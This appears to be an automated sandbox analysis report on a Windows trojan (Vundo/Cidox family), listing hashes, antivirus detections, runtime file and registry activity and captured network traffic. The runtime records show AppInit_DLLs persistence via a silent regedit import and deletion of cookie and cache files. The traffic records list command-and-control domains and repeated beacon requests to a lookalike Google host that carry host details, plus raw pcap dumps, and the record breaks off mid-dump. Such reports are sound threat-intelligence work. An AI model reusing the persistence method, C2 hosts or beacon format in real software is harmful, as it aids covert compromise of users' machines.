Analysis Date2014-12-03 06:52:19
MD520bcbec884b03dc1a690e27f20090c71
SHA1a78d592e4f006b7ef4fe98a9787a516cbf5de22a

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 86545ce5ca75d7e4dcf363015c199283 sha1: cda6553c89dc1bc24d72b2aaa0ece4da2a40021f size: 158208
Section.rdata md5: df525fbfab9c526fad0fbe0025155602 sha1: 318df8d4c2cf1223b4bafc97b7cdc92650f3d68b size: 7680
Section.data md5: c09bf44b072678e62bd78e5b20489cb8 sha1: 45d8724e9c2de16e85aff4da7b6be14231d58805 size: 3584
Section.rsrc md5: 88c88892e37f4916ac350085eba32dc9 sha1: 6f812df6a71df22d9135a47754dd2307eb9c7ecc size: 301568
Timestamp2012-10-18 11:34:07
PackerMicrosoft Visual C++ ?.?
PEhasha66d95d9cbdd82d1cc662d4c777e38c555ee3b19
IMPhash2aeec6ce5d40ec8b3bd612e86cb0d990
AV360 SafeGen:Variant.Symmi.7206
AVAd-AwareGen:Variant.Symmi.7206
AVAlwil (avast)Trojan-gen:Win32:Trojan-gen
AVArcabit (arcavir)no_virus
AVAuthentiumW32/Cidox.A.gen!Eldorado
AVAvira (antivir)TR/Vundo.Gen7
AVBullGuardGen:Variant.Symmi.7206
AVCA (E-Trust Ino)Win32/Vundo.N!generic
AVCAT (quickheal)no_virus
AVClamAVno_virus
AVDr. WebTrojan.Mayachok.17986
AVEmsisoftGen:Variant.Symmi.7206
AVEset (nod32)Win32/Citirevo.AD
AVFortinetW32/Cidox.AND!tr
AVFrisk (f-prot)W32/Cidox.A.gen!Eldorado
AVF-SecureGen:Variant.Symmi.7206
AVGrisoft (avg)Win32/Cryptor
AVIkarusTrojan-Downloader.Win32.Vundo
AVK7Riskware ( 0015e4f01 )
AVKasperskyTrojan.Win32.Generic
AVMalwareBytesBackdoor.Cidox
AVMcafeeno_virus
AVMicrosoft Security EssentialsTrojanDropper:Win32/Vundo.V
AVMicroWorld (escan)Gen:Variant.Symmi.7206
AVNormanGen:Variant.Symmi.7206
AVRisingno_virus
AVSophosno_virus
AVSymantecno_virus
AVTrend Microno_virus
AVVirusBlokAda (vba32)Trojan.Cidox.51105

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp
Creates FileC:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\BSDHA97U\desktop.ini
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\IIQ3LGTM\desktop.ini
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\desktop.ini
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\desktop.ini
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\D4Z32ED8\desktop.ini
Deletes FileC:\Documents and Settings\Administrator\Cookies\index.dat

Process
↳ C:\WINDOWS\Explorer.EXE

Creates File\Device\Afd\Endpoint
Creates FileC:\WINDOWS\system32\fjzhzyd.dll
Creates FileC:\Documents and Settings\Administrator\Cookies\cf
Deletes FileC:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp
Deletes FileC:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Creates ProcessC:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Winsock DNSclickbeta.ru
Winsock DNS91.220.35.154
Winsock DNSveroconma.com
Winsock DNSterrans.su
Winsock DNSgetinball.com
Winsock DNStheloamva.com
Winsock DNStryatdns.com
Winsock DNSclickclans.ru
Winsock DNSdentagod.com
Winsock DNSdenareclick.com
Winsock DNSdebijonda.com
Winsock DNSfescheck.com
Winsock DNSliteworns.com
Winsock DNSgetintsu.com
Winsock DNSnshouse1.com
Winsock DNSvengibit.com
Winsock DNStryangets.com
Winsock DNSnetrovad.com
Winsock DNSvornedix.com
Winsock DNSinzavora.com
Winsock DNSgetavodes.com
Winsock DNSclickstano.com

Process
↳ C:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg

RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs ➝
C:\WINDOWS\system32\fjzhzyd.dll\\x00

Network Details:

DNSdebijonda.com
Type: A
141.8.225.80
DNSveroconma.com
Type: A
74.117.179.241
DNStheloamva.com
Type: A
141.8.225.80
DNSvornedix.com
Type: A
141.8.225.80
DNSdentagod.com
Type: A
141.8.225.80
DNSliteworns.com
Type: A
141.8.225.80
DNSvengibit.com
Type: A
141.8.225.80
DNStryangets.com
Type: A
141.8.225.80
DNSgetintsu.com
Type: A
141.8.225.80
DNSgetavodes.com
Type: A
209.222.14.3
DNStryatdns.com
Type: A
209.222.14.3
DNSfescheck.com
Type: A
109.234.109.76
DNSinzavora.com
Type: A
141.8.225.80
DNSgetinball.com
Type: A
DNSnetrovad.com
Type: A
DNSterrans.su
Type: A
DNSclickstano.com
Type: A
DNSdenareclick.com
Type: A
DNSclickbeta.ru
Type: A
DNSnshouse1.com
Type: A
DNSclickclans.ru
Type: A
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=3683&av=0&vm=0&al=0&p=291&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg2Th6cYyx6E+fF6qQ684jGCzWXOZ7FMT2XUhlcslvKJU
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=3683&av=0&vm=0&al=0&p=291&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg2Th6cYyx6E+fF6qQ684jGCzWXOZ7FMT2QoBwbtW5V8r
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=3683&av=0&vm=0&al=0&p=291&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg2Th6cYyx6E+fF6qQ684jGCzWXOZ7FMT2QoBwbtW5V8r
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=3683&av=0&vm=0&al=0&p=291&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg2Th6cYyx6E+fF6qQ684jGCzWXOZ7FMT2VBgbPIZgIMO
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=3683&av=0&vm=0&al=0&p=291&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg2Th6cYyx6E+fF6qQ684jGCzWXOZ7FMT2VBgbPIZgIMO
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=3683&av=0&vm=0&al=0&p=291&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg2Th6cYyx6E+fF6qQ684jGCzWXOZ7FMT2asP3ogWtnv2
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=3683&av=0&vm=0&al=0&p=291&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg2Th6cYyx6E+fF6qQ684jGCzWXOZ7FMT2XGFssghYXvT
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=3683&av=0&vm=0&al=0&p=291&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg2Th6cYyx6E+fF6qQ684jGCzWXOZ7FMT2XGFssghYXvT
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=3683&av=0&vm=0&al=0&p=291&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg2Th6cYyx6E+fF6qQ684jGCzWXOZ7FMT2XGFssghYXvT
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=3683&av=0&vm=0&al=0&p=291&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg2Th6cYyx6E+fF6qQ684jGCzWXOZ7FMT2fyn/8nh8aWO
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=3683&av=0&vm=0&al=0&p=291&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg2Th6cYyx6E+fF6qQ684jGCzWXOZ7FMT2Q3hsPJwjDWJ
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=3683&av=0&vm=0&al=0&p=291&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg2Th6cYyx6E+fF6qQ684jGCzWXOZ7FMT2dtfNJWfOUgU
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=3683&av=0&vm=0&al=0&p=291&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg2Th6cYyx6E+fF6qQ684jGCzWXOZ7FMT2XGFssghYXvT
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=3683&av=0&vm=0&al=0&p=291&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg2Th6cYyx6E+fF6qQ684jGCzWXOZ7FMT2ZxPWycrlyn2
User-Agent:
Flows TCP192.168.1.1:1031 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1032 ➝ 74.117.179.241:80
Flows TCP192.168.1.1:1033 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1034 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1035 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1036 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1037 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1038 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1039 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1040 ➝ 209.222.14.3:80
Flows TCP192.168.1.1:1041 ➝ 209.222.14.3:80
Flows TCP192.168.1.1:1042 ➝ 109.234.109.76:80
Flows TCP192.168.1.1:1043 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1044 ➝ 91.220.35.154:80

Raw Pcap
0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d33 36383326   XX0000&key=3683&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d323931 266f733d 352e312e 32363030   =291&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796732 54683663 59797836 452b6646   Wyg2Th6cYyx6E+fF
0x000000b0 (00176)   36715136 38346a47 437a5758 4f5a3746   6qQ684jGCzWXOZ7F
0x000000c0 (00192)   4d543258 55686c63 736c764b 4a552048   MT2XUhlcslvKJU H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d33 36383326   XX0000&key=3683&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d323931 266f733d 352e312e 32363030   =291&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796732 54683663 59797836 452b6646   Wyg2Th6cYyx6E+fF
0x000000b0 (00176)   36715136 38346a47 437a5758 4f5a3746   6qQ684jGCzWXOZ7F
0x000000c0 (00192)   4d543251 6f427762 74573556 38722048   MT2QoBwbtW5V8r H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d33 36383326   XX0000&key=3683&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d323931 266f733d 352e312e 32363030   =291&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796732 54683663 59797836 452b6646   Wyg2Th6cYyx6E+fF
0x000000b0 (00176)   36715136 38346a47 437a5758 4f5a3746   6qQ684jGCzWXOZ7F
0x000000c0 (00192)   4d543251 6f427762 74573556 38722048   MT2QoBwbtW5V8r H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d33 36383326   XX0000&key=3683&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d323931 266f733d 352e312e 32363030   =291&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796732 54683663 59797836 452b6646   Wyg2Th6cYyx6E+fF
0x000000b0 (00176)   36715136 38346a47 437a5758 4f5a3746   6qQ684jGCzWXOZ7F
0x000000c0 (00192)   4d543256 42676250 495a6749 4d4f2048   MT2VBgbPIZgIMO H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d33 36383326   XX0000&key=3683&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d323931 266f733d 352e312e 32363030   =291&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796732 54683663 59797836 452b6646   Wyg2Th6cYyx6E+fF
0x000000b0 (00176)   36715136 38346a47 437a5758 4f5a3746   6qQ684jGCzWXOZ7F
0x000000c0 (00192)   4d543256 42676250 495a6749 4d4f2048   MT2VBgbPIZgIMO H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d33 36383326   XX0000&key=3683&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d323931 266f733d 352e312e 32363030   =291&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796732 54683663 59797836 452b6646   Wyg2Th6cYyx6E+fF
0x000000b0 (00176)   36715136 38346a47 437a5758 4f5a3746   6qQ684jGCzWXOZ7F
0x000000c0 (00192)   4d543261 7350336f 6757746e 76322048   MT2asP3ogWtnv2 H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d33 36383326   XX0000&key=3683&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d323931 266f733d 352e312e 32363030   =291&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796732 54683663 59797836 452b6646   Wyg2Th6cYyx6E+fF
0x000000b0 (00176)   36715136 38346a47 437a5758 4f5a3746   6qQ684jGCzWXOZ7F
0x000000c0 (00192)   4d543258 47467373 67685958 76542048   MT2XGFssghYXvT H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d33 36383326   XX0000&key=3683&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d323931 266f733d 352e312e 32363030   =291&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796732 54683663 59797836 452b6646   Wyg2Th6cYyx6E+fF
0x000000b0 (00176)   36715136 38346a47 437a5758 4f5a3746   6qQ684jGCzWXOZ7F
0x000000c0 (00192)   4d543258 47467373 67685958 76542048   MT2XGFssghYXvT H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d33 36383326   XX0000&key=3683&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d323931 266f733d 352e312e 32363030   =291&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796732 54683663 59797836 452b6646   Wyg2Th6cYyx6E+fF
0x000000b0 (00176)   36715136 38346a47 437a5758 4f5a3746   6qQ684jGCzWXOZ7F
0x000000c0 (00192)   4d543258 47467373 67685958 76542048   MT2XGFssghYXvT H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d33 36383326   XX0000&key=3683&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d323931 266f733d 352e312e 32363030   =291&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796732 54683663 59797836 452b6646   Wyg2Th6cYyx6E+fF
0x000000b0 (00176)   36715136 38346a47 437a5758 4f5a3746   6qQ684jGCzWXOZ7F
0x000000c0 (00192)   4d543266 796e2f38 6e683861 574f2048   MT2fyn/8nh8aWO H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d33 36383326   XX0000&key=3683&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d323931 266f733d 352e312e 32363030   =291&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796732 54683663 59797836 452b6646   Wyg2Th6cYyx6E+fF
0x000000b0 (00176)   36715136 38346a47 437a5758 4f5a3746   6qQ684jGCzWXOZ7F
0x000000c0 (00192)   4d543251 33687350 4a776a44 574a2048   MT2Q3hsPJwjDWJ H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d33 36383326   XX0000&key=3683&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d323931 266f733d 352e312e 32363030   =291&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796732 54683663 59797836 452b6646   Wyg2Th6cYyx6E+fF
0x000000b0 (00176)   36715136 38346a47 437a5758 4f5a3746   6qQ684jGCzWXOZ7F
0x000000c0 (00192)   4d543264 74664e4a 57664f55 67552048   MT2dtfNJWfOUgU H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d33 36383326   XX0000&key=3683&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d323931 266f733d 352e312e 32363030   =291&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
